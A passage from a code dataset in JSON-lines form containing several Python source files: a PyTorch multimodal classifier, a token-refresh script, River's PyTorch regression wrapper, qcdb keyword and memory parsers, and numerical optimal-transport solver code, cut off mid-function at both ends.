256)\n self.bn3 = nn.BatchNorm1d(256)\n self.linear4= nn.Linear(256,n_class)\n\n def forward(self, data, global_ft=False):\n\n img, pt = data\n ft_pt=self.model_pt(pt)\n ft_img=self.model_img(img)\n\n total_img_pt_ft = torch.cat((ft_img,ft_pt),1)\n\n x = F.leaky_relu(self.bn6(self.linear1(total_img_pt_ft)), negative_slope=0.2)\n x = self.dp1(x)\n x = F.leaky_relu(self.bn7(self.linear2(x)), negative_slope=0.2)\n x = self.dp2(x)\n x = F.leaky_relu(self.bn3(self.linear3(x)),negative_slope=0.2)\n x = self.linear4(x)\n\n if global_ft:\n return (x),(total_img_pt_ft)\n else:\n return x\n\n","repo_name":"chidambar-gif/3D-object-retrieval","sub_path":"models/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32626303820","text":"import qa\n\nif __name__ == '__main__':\n # 获取token并储存在txt文件中,定期更新\n with open(r'token.txt','a+',encoding='utf-8') as f:\n f.truncate(0)\n token=qa.token_get()\n with open(\"token.txt\",\"w\") as f:\n f.write(token) \n # 自带文件关闭功能,不需要再写f.close()\n\n","repo_name":"Rah-xephon/sdu_answer_system","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19446420085","text":"import torch\n\nfrom .. 
import base\n\n__all__ = [\"PyTorch2RiverRegressor\"]\n\n\nclass PyTorch2RiverBase:\n def __init__(self, net, loss_fn, optimizer, batch_size, x_tensor, y_tensor):\n self.net = net\n self.loss_fn = loss_fn\n self.optimizer = optimizer\n self.batch_size = batch_size\n self.x_tensor = x_tensor\n self.y_tensor = y_tensor\n self._x_batch = [None] * batch_size\n self._y_batch = [None] * batch_size\n self._batch_i = 0\n\n def learn_one(self, x, y):\n\n self._x_batch[self._batch_i] = list(x.values())\n self._y_batch[self._batch_i] = [y]\n\n self._batch_i += 1\n\n if self._batch_i == self.batch_size:\n\n x = self.x_tensor(self._x_batch)\n y = self.y_tensor(self._y_batch)\n\n self.optimizer.zero_grad()\n y_pred = self.net(x)\n loss = self.loss_fn(y_pred, y)\n loss.backward()\n self.optimizer.step()\n self._batch_i = 0\n\n return self\n\n\nclass PyTorch2RiverRegressor(PyTorch2RiverBase, base.Regressor):\n \"\"\"Compatibility layer from PyTorch to River for regression.\n\n Parameters\n ----------\n net\n loss_fn\n optimizer\n batch_size\n\n Examples\n --------\n\n >>> from river import compat\n >>> from river import datasets\n >>> from river import evaluate\n >>> from river import metrics\n >>> from river import preprocessing\n >>> import torch\n >>> from torch import nn\n >>> from torch import optim\n\n >>> _ = torch.manual_seed(0)\n\n >>> dataset = datasets.TrumpApproval()\n\n >>> n_features = 6\n >>> net = nn.Sequential(\n ... nn.Linear(n_features, 3),\n ... nn.Linear(3, 1)\n ... )\n\n >>> model = (\n ... preprocessing.StandardScaler() |\n ... compat.PyTorch2RiverRegressor(\n ... net=net,\n ... loss_fn=nn.MSELoss(),\n ... optimizer=optim.SGD(net.parameters(), lr=1e-3),\n ... batch_size=2\n ... )\n ... )\n >>> metric = metrics.MAE()\n\n >>> evaluate.progressive_val_score(dataset, model, metric).get()\n 2.78258\n\n \"\"\"\n\n def __init__(\n self,\n net: torch.nn.Sequential,\n loss_fn: torch.nn.modules.loss._Loss,\n optimizer: torch.optim.Optimizer,\n batch_size=1,\n ):\n super().__init__(\n net=net,\n loss_fn=loss_fn,\n optimizer=optimizer,\n batch_size=batch_size,\n x_tensor=torch.Tensor,\n y_tensor=torch.Tensor,\n )\n\n def predict_one(self, x):\n x = self.x_tensor(list(x.values()))\n return self.net(x).item()\n","repo_name":"Bantey17/river","sub_path":"river/compat/pytorch.py","file_name":"pytorch.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70251791844","text":"import re\n\nfrom ..exceptions import KeywordValidationError\n\n\ndef enum(inputval):\n allowed = inputval.upper().split()\n\n def closedenum(x, allowed=allowed):\n if x.upper() in allowed:\n return x.upper()\n else:\n raise KeywordValidationError(\"\"\"Not allowed value: {} not in {}\"\"\".format(inputval, allowed))\n\n return closedenum\n\n\ndef enum_bool(inputval):\n allowed = inputval.upper().split()\n\n def closedenum(x, allowed=allowed):\n if x.upper() in allowed:\n if x.upper() == \"TRUE\":\n return \"ON\"\n elif x.upper() == \"FALSE\":\n return \"OFF\"\n else:\n return x.upper()\n else:\n raise KeywordValidationError(\"\"\"Not allowed value: {} not in {}\"\"\".format(inputval, allowed))\n\n return closedenum\n\n\ndef onoff_boolean(inputval):\n yes = re.compile(r\"^(yes|true|on|1)\", re.IGNORECASE)\n no = re.compile(r\"^(no|false|off|0)\", re.IGNORECASE)\n\n if yes.match(str(inputval)):\n return \"on\"\n elif no.match(str(inputval)):\n return \"off\"\n else:\n raise KeywordValidationError(\"\"\"Can't interpret into 
boolean: {}\"\"\".format(inputval))\n\n\ndef intenum(inputval, nullable=False):\n allowed = [int(x) for x in inputval.split()]\n if nullable:\n allowed.append(None)\n\n def closedenum(x, allowed=allowed):\n if x in allowed:\n return x\n else:\n raise KeywordValidationError(\"\"\"Not allowed integer value: {} not in {}\"\"\".format(inputval, allowed))\n\n return closedenum\n\n\ndef mixedenum(inputval, nullable=False):\n allowed = []\n for x in inputval.split():\n try:\n val = int(x)\n except ValueError:\n val = x\n\n allowed.append(val)\n\n if nullable:\n allowed.append(None)\n\n def closedenum(x, allowed=allowed):\n if x in allowed:\n return x\n else:\n raise KeywordValidationError(\"\"\"Not allowed mixed value: {} not in {}\"\"\".format(inputval, allowed))\n\n return closedenum\n\n\ndef casesensitive_enum(inputval):\n allowed = inputval.split()\n\n def closedenum(x, allowed=allowed):\n if x in allowed:\n return x\n else:\n raise KeywordValidationError(\"\"\"Not allowed case-sensitive value: {} not in {}\"\"\".format(inputval, allowed))\n\n return closedenum\n\n\ndef boolean(inputval):\n yes = re.compile(r\"^(yes|true|on|1)\", re.IGNORECASE)\n no = re.compile(r\"^(no|false|off|0)\", re.IGNORECASE)\n\n if yes.match(str(inputval)):\n return True\n elif no.match(str(inputval)):\n return False\n else:\n raise KeywordValidationError(\"\"\"Can't interpret into boolean: {}\"\"\".format(inputval))\n\n\ndef sphcart(inputval):\n sph = re.compile(r\"^(yes|true|on|1|sph|spherical)\", re.IGNORECASE)\n cart = re.compile(r\"^(no|false|off|0|cart|cartesian)\", re.IGNORECASE)\n\n if sph.match(str(inputval)):\n return True\n elif cart.match(str(inputval)):\n return False\n else:\n raise KeywordValidationError(\"\"\"Can't interpret into boolean True (sph) or False (cart): {}\"\"\".format(inputval))\n\n\ndef gridradang(inputval):\n\n if isinstance(inputval, dict):\n retdict = {}\n for k, v in inputval.items():\n rad, ang = v\n retdict[k] = (positive_integer(rad), positive_integer(ang))\n return dict(sorted(retdict.items())) # to place '' key first\n else:\n rad, ang = inputval\n return {\"\": (positive_integer(rad), positive_integer(ang))}\n\n\ndef bool_or_elem_dict(inputval):\n if isinstance(inputval, dict):\n retdict = {k.capitalize(): positive_integer(v) for k, v in inputval.items()}\n return dict(sorted(retdict.items()))\n else:\n return boolean(inputval)\n\n\ndef atompair(inputval):\n\n if isinstance(inputval, dict):\n retdict = {}\n for k, v in inputval.items():\n atom1, atom2 = v\n retdict[k] = (positive_integer(atom1), positive_integer(atom2))\n return dict(sorted(retdict.items())) # to place '' key first\n else:\n return {\"\"}\n\n\ndef percentage(inputval):\n if 0.0 <= inputval <= 100.0:\n return float(inputval)\n else:\n raise KeywordValidationError(\"Percentage should be between 0 and 100: {}\".format(inputval))\n\n\ndef nonnegative_float(inputval):\n if 0.0 <= inputval:\n return float(inputval)\n else:\n raise KeywordValidationError(\"Float should be non-negative: {}\".format(inputval))\n\n\ndef positive_integer(inputval):\n if inputval > 0 and float(inputval).is_integer():\n return int(inputval)\n else:\n raise KeywordValidationError(\"Positive integer, if you please: {}\".format(inputval))\n\n\ndef nonnegative_integer(inputval):\n if inputval > -1 and float(inputval).is_integer():\n return int(inputval)\n else:\n raise KeywordValidationError(\"Non-negative integer number, if you please: {}\".format(inputval))\n\n\ndef integer(inputval):\n if float(inputval).is_integer():\n return 
int(inputval)\n else:\n raise KeywordValidationError(\"Integer number, if you please: {}\".format(inputval))\n\n\ndef parse_convergence(inputval):\n\n if inputval > 0 and isinstance(inputval, int):\n return pow(10.0, -inputval)\n elif inputval > 0 and inputval < 5:\n return inputval\n else:\n raise KeywordValidationError(\"wth! you call this a convergence criterion? {}\".format(inputval))\n\n\ndef parse_memory(inputval, min_mem_allowed=262144000):\n \"\"\"Validates expression for total memory allocation. Takes memory value\n `inputval` as type int, float, or str; int and float are taken literally\n as bytes to be set, string taken as a unit-containing value (e.g., 30 mb)\n which is case-insensitive.\n\n :returns: *memory_amount* (float) Number of bytes of memory\n\n :raises: ValidationError when <500MiB or disallowed type or misformatted\n\n :examples:\n\n >>> # [1] Passing absolute number of bytes\n >>> psi4.set_memory(600000000)\n >>> psi4.get_memory()\n Out[1]: 600000000L\n\n >>> # [2] Passing memory value as string with units\n >>> psi4.set_memory('30 GB')\n >>> psi4.get_memory()\n Out[2]: 30000000000L\n\n >>> # Good examples\n >>> psi4.set_memory(800000000) # 800000000\n >>> psi4.set_memory(2004088624.9) # 2004088624\n >>> psi4.set_memory(1.0e9) # 1000000000\n >>> psi4.set_memory('600 mb') # 600000000\n >>> psi4.set_memory('600.0 MiB') # 629145600\n >>> psi4.set_memory('.6 Gb') # 600000000\n >>> psi4.set_memory(' 100000000kB ') # 100000000000\n >>> psi4.set_memory('2 eb') # 2000000000000000000\n\n >>> # Bad examples\n >>> psi4.set_memory({}) # odd type\n >>> psi4.set_memory('') # no info\n >>> psi4.set_memory(\"8 dimms\") # unacceptable units\n >>> psi4.set_memory(\"1e5 gb\") # string w/ exponent\n >>> psi4.set_memory(\"5e5\") # string w/o units\n >>> psi4.set_memory(2000) # mem too small\n >>> psi4.set_memory(-5e5) # negative (and too small)\n\n \"\"\"\n # Handle memory given in bytes directly (int or float)\n if isinstance(inputval, (int, float)):\n val = inputval\n units = \"\"\n # Handle memory given as a string\n elif isinstance(inputval, str):\n memory_string = re.compile(r\"^\\s*(\\d*\\.?\\d+)\\s*([KMGTPBE]i?B)\\s*$\", re.IGNORECASE)\n matchobj = re.search(memory_string, inputval)\n if matchobj:\n val = float(matchobj.group(1))\n units = matchobj.group(2)\n else:\n raise KeywordValidationError(\n \"\"\"Invalid memory specification: {}. Try 5e9 or '5 gb'.\"\"\".format(repr(inputval))\n )\n else:\n raise KeywordValidationError(\n \"\"\"Invalid type {} in memory specification: {}. Try 5e9 or '5 gb'.\"\"\".format(type(inputval), repr(inputval))\n )\n\n # Units decimal or binary?\n multiplier = 1000\n if \"i\" in units.lower():\n multiplier = 1024\n units = units.lower().replace(\"i\", \"\").upper()\n\n # Build conversion factor, convert units\n unit_list = [\"\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\"]\n mult = 1\n for unit in unit_list:\n if units.upper() == unit:\n break\n mult *= multiplier\n\n memory_amount = int(val * mult)\n\n # Check minimum memory requirement\n if memory_amount < min_mem_allowed:\n raise KeywordValidationError(\n \"\"\"set_memory(): Requested {:.3} MiB ({:.3} MB); minimum 250 MiB (263 MB). 
Please, sir, I want some more.\"\"\".format(\n memory_amount / 1024 ** 2, memory_amount / 1000 ** 2\n )\n )\n\n return memory_amount\n\n\ndef parse_memory_nomin(inputval):\n return parse_memory(inputval, min_mem_allowed=0)\n","repo_name":"qcdb/qcdb","sub_path":"qcdb/keywords/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":8756,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"35023769006","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 24 16:09:00 2014\r\n\r\n@author: hdemarch\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport timeit\r\nimport math\r\nfrom multiprocessing import Pool\r\n\r\nimport Generic_Functions as gf\r\n \r\n\r\n\r\n\r\ndef loc_convex_hull(x_0, func, grid, plot = False, \r\n zero = 1e-10, hidden_contact = False,\r\n debug_mode = False, param_hidden = 1e-10,\r\n gradient_guess = None):\r\n d = len(x_0)\r\n contact = np.array([])\r\n argcontact = np.array([])\r\n shift = -np.copy(func)\r\n bary_coeffs = [-1.]\r\n infty = 1/zero\r\n if gradient_guess is None:\r\n gradient = np.zeros(d)\r\n else:\r\n gradient = gradient_guess\r\n elem_scalar = grid*gradient\r\n scalar_product =np.sum(elem_scalar, axis=1)\r\n shift += scalar_product\r\n if plot:\r\n fig_num=0\r\n please_break = False\r\n while gf.approx_Negative(bary_coeffs):\r\n if (len(contact)==d+1 or please_break):\r\n argneg=np.argmin(bary_coeffs)\r\n contact = np.delete(contact,argneg,0)\r\n argcontact = np.delete(argcontact,argneg,0)\r\n please_break = False\r\n if len(contact)>0:\r\n p=gf.projection(x_0,np.copy(contact))\r\n if gf.approx_Equal(p,x_0):\r\n bary_DATA =gf.barycenter(x_0,contact,argcontact)\r\n bary_coeffs = bary_DATA['coeffs']\r\n contact = bary_DATA[\"vectors\"]\r\n argcontact = bary_DATA[\"argvectors\"]\r\n please_break = True\r\n if plot:\r\n gf.print_dots(x_0,contact,fig_num)\r\n fig_num = fig_num+1\r\n else:\r\n diff = x_0-p\r\n u=diff/np.linalg.norm(diff)\r\n elem_scalar = grid-p\r\n elem_scalar *=u\r\n scalar_product =np.sum(elem_scalar, axis=1)\r\n scalar_product_plus = np.maximum(scalar_product,zero)\r\n prohibition = np.maximum(np.minimum(2*zero-scalar_product_plus,zero),0)\r\n prohibition *= infty**2\r\n quotient = shift/scalar_product_plus\r\n quotient += prohibition\r\n elif len(contact)==0:\r\n quotient = shift\r\n u=0*x_0\r\n p=0*x_0\r\n if not please_break:\r\n argument = np.argmin(quotient)\r\n if debug_mode:\r\n print(\"x_0\",x_0)\r\n print(\"shift before\",shift)\r\n for quo in quotient:\r\n print(\"quotient\",quo)\r\n print(\"argument\",argument)\r\n for con in contact:\r\n print(\"contact = \",con)\r\n print(\"quotient[argument]before\", quotient[argument])\r\n quot_min = quotient[argument]\r\n if len(contact)>0:\r\n shift -= quot_min*scalar_product\r\n gradient -= quot_min*u\r\n else:\r\n shift -= quot_min\r\n if debug_mode:\r\n print(\"quotient[argument]\", quot_min)\r\n if debug_mode:\r\n print(\"shift after\",shift) \r\n xmin=grid[argument]\r\n if len(contact)==0:\r\n contact = np.array([xmin])\r\n else:\r\n contact = np.append(contact,[xmin],axis = 0)\r\n argcontact = np.append(argcontact,argument)\r\n if len(contact)==d+1:\r\n bary_DATA =gf.barycenter(x_0,contact,argcontact)\r\n bary_coeffs = bary_DATA['coeffs']\r\n contact = bary_DATA[\"vectors\"]\r\n if plot:\r\n gf.print_dots(x_0,contact,fig_num)\r\n fig_num = fig_num+1\r\n argcontact = bary_DATA[\"argvectors\"]\r\n nb_contacts = len(contact)\r\n values = np.zeros(nb_contacts)\r\n for i in range(nb_contacts):\r\n values[i] = 
func[int(argcontact[i])]\r\n value = np.dot(bary_coeffs,values)\r\n total_contact = list(contact)\r\n total_argcontact = list(argcontact)\r\n if hidden_contact:\r\n for index in argcontact:\r\n shift[int(index)] += infty\r\n argmin = np.argmin(shift)\r\n while shift[argmin] < param_hidden:\r\n total_contact.append(grid[int(argmin)])\r\n total_argcontact.append(argmin)\r\n shift[argmin] += infty\r\n argmin = np.argmin(shift)\r\n return {'value':value , 'contact' : contact , 'argcontact' : argcontact,\r\n 'coeffs' : bary_coeffs , 'total_contact' : total_contact,\r\n 'total_argcontact' : total_argcontact , 'gradient' : gradient }\r\n\r\n\r\n\r\n\r\n\r\ndef Gradient_stochastique(psi_0, grid, cost,\r\n tolerance = 1e-4, nbpas=40000, epsilon = 0):\r\n mu_0 = grid.mu\r\n nu_0 = grid.nu\r\n psi = np.copy(psi_0)\r\n for n in range(nbpas):\r\n grad = epsilon*psi\r\n rand = np.random.rand(2)\r\n prob_cumul_x = 0\r\n prob_cumul_y = 0\r\n for i in range(len(grid.grid)):\r\n prob_cumul_x = prob_cumul_x+mu_0[i]\r\n if prob_cumul_x>=rand[0]:\r\n index_x = i\r\n break\r\n for i in range(len(grid.grid)):\r\n prob_cumul_y = prob_cumul_y+nu_0[i]\r\n if prob_cumul_y>=rand[1]: # bug fix: sample y from the second uniform draw; rand[0] is already used for x\r\n index_y = i\r\n break\r\n gamma = 1./(n+1)**(0.6)\r\n x_0=grid.grid[index_x]\r\n func = grid.func_grid(lambda y: cost(x_0,y))\r\n func -= psi\r\n DATA_convexhull=loc_convex_hull(x_0,func,grid)\r\n arguments = DATA_convexhull['argcontact']\r\n Coeff_bary = DATA_convexhull['coeffs']\r\n for j in range(len(arguments)):\r\n arg = int(arguments[j])\r\n grad[arg]= grad[arg]-Coeff_bary[j]*mu_0[arg]\r\n grad[index_y]=grad[index_y]-1\r\n psi = psi - gamma*grad\r\n if n % 40 == 0:\r\n print(n)\r\n return {'x': psi}\r\n\r\n\r\ndef auxiliary_phi(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n mu = arg['mu']\r\n infty = arg['infty']\r\n martingale = arg['martingale']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n if martingale:\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n arg_Gibbs = (cost_array-psi-np.sum(np.reshape(h[i],(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-psi)/epsilon\r\n maximum = np.max(arg_Gibbs)\r\n arg_Gibbs -= maximum\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n if mu[i] == 0.:\r\n logmu_i = -infty\r\n print(\"mu equals zero at x=\"+str(gridX[i]))\r\n else:\r\n logmu_i = np.log(mu[i])\r\n phi_i = -epsilon*(logmu_i- (np.log(Gibbs)+maximum) )\r\n \r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'phi_i' : phi_i}\r\n\r\n\r\ndef auxiliary_psi(j, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n nu = arg['nu']\r\n infty = arg['infty']\r\n martingale = arg['martingale']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX,gridY[j])\r\n if martingale:\r\n Y_X = np.reshape(gridY[j],(1,dim))-gridX\r\n 
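# Editor's note: the block below repeats the stabilized log-sum-exp pattern from auxiliary_phi; the max of the Gibbs exponent is subtracted before exp() to avoid overflow, then added back inside the log when psi_j is assembled.\r\n 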
arg_Gibbs = (cost_array-phi-np.sum(h*Y_X, axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-phi)/epsilon\r\n maximum = np.max(arg_Gibbs)\r\n arg_Gibbs -= maximum\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n if nu[j] == 0.:\r\n lognu_j = -infty\r\n print(\"nu equals zero at y=\"+str(gridY[j]))\r\n else:\r\n lognu_j = np.log(nu[j])\r\n psi_j = -epsilon*(lognu_j- (np.log(Gibbs)+maximum) )\r\n \r\n time_comp = timeit.default_timer()-t_0\r\n return {'j' : j , 'time_comp' : time_comp, 'psi_j' : psi_j}\r\n\r\n\r\ndef auxiliary_h(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n psi = arg['psi']\r\n lenY = arg['lenY']\r\n hi_0 = arg['h'][i]\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n minimize = arg['minimize']\r\n nmax_Newton_h = arg['nmax_Newton_h']\r\n calc_phi = arg['calc_phi']\r\n mu = arg['mu']\r\n infty = arg['infty']\r\n zero = arg['zero']\r\n lenX = arg['lenX']\r\n debug_mode = arg['debug_mode']\r\n newNewton = arg['newNewton']\r\n pow_distance = arg['pow_distance']\r\n tol_Newton_h = arg['tol_Newton_h']\r\n precise_h = arg['precise_h']\r\n safe_solving = arg['safe_solving']\r\n if safe_solving:\r\n hardcore_compute = arg['restrict_compute'][i] \r\n previous_error = arg['previous_error'][i] \r\n iter_fail = arg['iter_fail']\r\n else:\r\n hardcore_compute = False\r\n \r\n t_0 = timeit.default_timer()\r\n if precise_h:\r\n tol_Newton_h *= min(1., epsilon)\r\n cost_array = cost(gridX[i],gridY)\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n \r\n if calc_phi:#???\r\n mu_i = max(mu[i], zero/lenX)\r\n if mu[i] == 0.:\r\n logmu_i = -infty\r\n else:\r\n logmu_i = np.log(mu[i])\r\n DATA = {'phi_i' : None, 'hi' : None, 'gradient' : None,\r\n 'result_found' : False, 'result_opt' : None}\r\n def phi_from_h(hi):\r\n arg_Gibbs = (cost_array-psi-np.sum(np.reshape(hi,(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n maximum = np.max(arg_Gibbs)\r\n arg_Gibbs -= maximum\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n phi_i_loc = -epsilon*(logmu_i- (np.log(Gibbs)+maximum) )\r\n return phi_i_loc\r\n else:\r\n arg_Gibbs_0 = (cost_array-psi-np.sum(np.reshape(hi_0,(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n arg_Gibbs_0 -= np.max(arg_Gibbs_0)\r\n Gibbs_0 = np.exp(arg_Gibbs_0)\r\n Z_0 = np.sum(Gibbs_0)\r\n \r\n def value_h(hi):\r\n if DATA['result_found']:\r\n return (0, 0*hi)\r\n if calc_phi:\r\n DATA['hi'] = hi\r\n DATA['phi_i'] = phi_from_h(hi)\r\n phi_i = DATA['phi_i']\r\n arg_Gibbs = (cost_array-psi-phi_i-np.sum(np.reshape(hi,(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n if debug_mode == 4:\r\n gf.check(gf.approx_Equal(np.sum(Gibbs),\r\n mu[i]), (np.sum(Gibbs), mu[i]))\r\n value = (epsilon+phi_i)*mu_i\r\n if debug_mode == 4:\r\n gf.check(np.sum(Gibbs), mu_i)\r\n gradient = -np.sum(np.reshape(Gibbs,\r\n (lenY, 1))*Y_X, axis = 0)\r\n DATA['gradient'] = gradient\r\n else:\r\n arg_Gibbs = arg_Gibbs_0 -np.sum(np.reshape(hi,(1,dim))*Y_X, axis = 1)/epsilon\r\n Gibbs = np.exp(arg_Gibbs)/Z_0\r\n value = epsilon*np.sum(Gibbs)\r\n gradient = -np.sum(np.reshape(Gibbs,\r\n (lenY, 1))*Y_X, axis = 0)\r\n if not newNewton:\r\n if np.linalg.norm(gradient, 1) <= tol_Newton_h:\r\n DATA['result_found'] = True\r\n DATA['result_opt'] = hi\r\n if debug_mode == 5:\r\n print(\"result found.\")\r\n val = value/mu_i\r\n grad = 
gradient/mu_i\r\n return (val, grad)\r\n def hessian_h(hi):\r\n if calc_phi:\r\n phi_i = DATA['phi_i']\r\n arg_Gibbs = (cost_array-psi-phi_i-np.sum(np.reshape(hi,(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n hessian = 1/epsilon*np.sum(np.reshape(Gibbs,\r\n (lenY,1,1))*np.reshape(Y_X,\r\n (lenY,dim,1))*np.reshape(Y_X,\r\n (lenY,1,dim)), axis = 0)\r\n if gf.approx_Equal(DATA['hi'], hi, tolerance = tol_Newton_h):\r\n gradient = DATA['gradient']\r\n else:\r\n gradient = value_h(hi)[1]\r\n hessian -= 1/epsilon*1/mu_i*np.reshape(gradient,\r\n (dim, 1))*np.reshape(gradient,(1, dim))\r\n else:\r\n arg_Gibbs = arg_Gibbs_0 -np.sum(np.reshape(hi,(1,dim))*Y_X,\r\n axis = 1)/epsilon\r\n Gibbs = np.exp(arg_Gibbs)/Z_0\r\n hessian = 1/epsilon*np.sum(np.reshape(Gibbs,\r\n (lenY,1,1))*np.reshape(Y_X,\r\n (lenY,dim,1))*np.reshape(Y_X,\r\n (lenY,1,dim)),axis = 0)\r\n return hessian/mu_i\r\n \r\n x0 = hi_0\r\n if debug_mode == 5:\r\n disp = True\r\n else:\r\n disp = False\r\n if not hardcore_compute:\r\n if newNewton:\r\n result = gf.Newton(value_h, hessian_h, x0 = x0, tol = tol_Newton_h,\r\n maxiter= nmax_Newton_h, disp= disp,\r\n pow_distance = pow_distance,\r\n order_hess = 1./epsilon)\r\n else:\r\n result = minimize(value_h, x0 = x0,\r\n method='Newton-CG',\r\n jac=True, hess = hessian_h,\r\n tol=tol_Newton_h,\r\n options={'maxiter': nmax_Newton_h,\r\n 'xtol' : tol_Newton_h,\r\n 'disp' : disp})\r\n elif hardcore_compute:\r\n epsilon_sto = epsilon\r\n epsilon_end = epsilon\r\n norm_psi = np.linalg.norm(psi, np.inf)\r\n size_Delta = norm_psi+1.\r\n epsilon_start = min(size_Delta/10., previous_error)*2**iter_fail\r\n if epsilon_start < previous_error*2**iter_fail:\r\n norm_x0 = np.linalg.norm(x0, 1)\r\n x0 /= max(norm_x0/(10.*size_Delta), 1.)\r\n if epsilon_end < epsilon_start:\r\n nb_iter = int(2+np.rint(-np.log2(epsilon_end/epsilon_start)))\r\n d_eps = (epsilon_end/epsilon_start)**(1./(nb_iter-1.))\r\n else:\r\n nb_iter = int(2+np.rint(np.log2(epsilon_end/epsilon_start)))\r\n d_eps = (epsilon_end/epsilon_start)**(1./(nb_iter-1.))\r\n for step in range(nb_iter):\r\n epsilon = epsilon_start*d_eps**step\r\n if newNewton:\r\n result = gf.Newton(value_h, hessian_h, x0 = x0, tol = tol_Newton_h,\r\n maxiter= nmax_Newton_h, disp= disp,\r\n pow_distance = pow_distance,\r\n order_hess = 1./epsilon)\r\n x0 = result['x']\r\n else:\r\n result = minimize(value_h, x0 = x0,\r\n method='Newton-CG',\r\n jac=True, hess = hessian_h,\r\n tol=tol_Newton_h,\r\n options={'maxiter': nmax_Newton_h,\r\n 'xtol' : tol_Newton_h,\r\n 'disp' : disp})\r\n if calc_phi:\r\n if newNewton:\r\n x0 = result['x']\r\n elif DATA['result_found']:\r\n x0 = DATA['result_opt']\r\n else:\r\n x0 = result.x\r\n\r\n epsilon = epsilon_sto\r\n \r\n time_comp = timeit.default_timer()-t_0\r\n if calc_phi:\r\n if newNewton:\r\n hi = result['x']\r\n elif DATA['result_found']:\r\n hi = DATA['result_opt']\r\n else:\r\n hi = result.x\r\n if gf.approx_Equal(hi, DATA['hi'], tolerance = zero**2):\r\n phi_i = DATA['phi_i']\r\n else:\r\n phi_i = phi_from_h(hi)\r\n\r\n else:\r\n phi_i = None\r\n hi = np.copy(hi_0) # fix: hi was previously unbound here; in this branch the optimizer works on an increment relative to hi_0 (Gibbs_0 is centered at hi_0)\r\n if newNewton:\r\n hi += result['x']\r\n elif DATA['result_found']:\r\n hi += DATA['result_opt']\r\n else:\r\n hi += result.x\r\n if debug_mode == 5:\r\n print(\"grad norm wololo\", np.linalg.norm(DATA['gradient']))\r\n return {'hi' : hi , 'i' : i , 'time_comp' : time_comp, 'phi_i' : phi_i,\r\n 'gradient' : DATA['gradient']/mu_i}\r\n\r\n\r\n\r\ndef auxiliary_h_index(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = 
arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n psi = arg['psi']\r\n lenY = arg['lenY']\r\n hi_0 = arg['h'][i]\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n minimize = arg['minimize']\r\n nmax_Newton_h = arg['nmax_Newton_h']\r\n calc_phi = arg['calc_phi']\r\n mu = arg['mu']\r\n infty = arg['infty']\r\n zero = arg['zero']\r\n lenX = arg['lenX']\r\n debug_mode = arg['debug_mode']\r\n newNewton = arg['newNewton']\r\n pow_distance = arg['pow_distance']\r\n tol_Newton_h = arg['tol_Newton_h']\r\n index = arg['index']\r\n pen_h = 0.#1e-10#???\r\n \r\n hi_index_0 = hi_0[index]\r\n x_i = gridX[i]\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(x_i, gridY)\r\n DATA = {'phi_i' : None, 'gradient' : None, 'hi': hi_0, 'hi_index' : None,\r\n 'result_found' : False, 'result_opt' : None}\r\n mu_i = max(mu[i], zero/lenX)\r\n if 